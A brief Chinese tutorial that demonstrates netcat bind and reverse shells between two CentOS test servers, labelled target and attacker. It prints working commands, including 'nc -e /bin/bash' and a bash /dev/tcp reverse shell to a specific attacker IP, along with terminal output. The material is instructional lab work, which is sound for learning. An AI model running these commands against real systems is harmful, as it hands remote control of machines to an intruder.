centos1为目标服务器,我这里是centos的一台测试机器。ip为101.200.41.219
centos2为攻击者机器,ip为8.140.129.23
最终是将centos1的shell反弹到centos2上面。
一、正向反弹shell
在centos1上面执行
[root@wltest ~]# nc -lvp 5555 -e /bin/bash
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
在centos2上面执行
nc 101.200.41.219 5555
然后就可以shell了
二、反向反弹shell
首先在攻击者服务器也就是centos2机器上面执行
[root@iZ2zeckpvpsaii62eyh834Z ~]# nc -lvp 5002
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::5002
Ncat: Listening on 0.0.0.0:5002
Ncat: Connection from 101.200.41.219.
Ncat: Connection from 101.200.41.219:44134.
[root@wltest ~]#
然后在目标机器centos1执行
[root@wltest ~]# bash -i >& /dev/tcp/8.140.129.23/5002 0>&1
在centos2机器上面执行nc -lvp 5002后会处于一个监听的状态,等在centos1上面执行
bash -i >& /dev/tcp/8.140.129.23/5002 0>&1后,centos上上面就进入了centos的shell了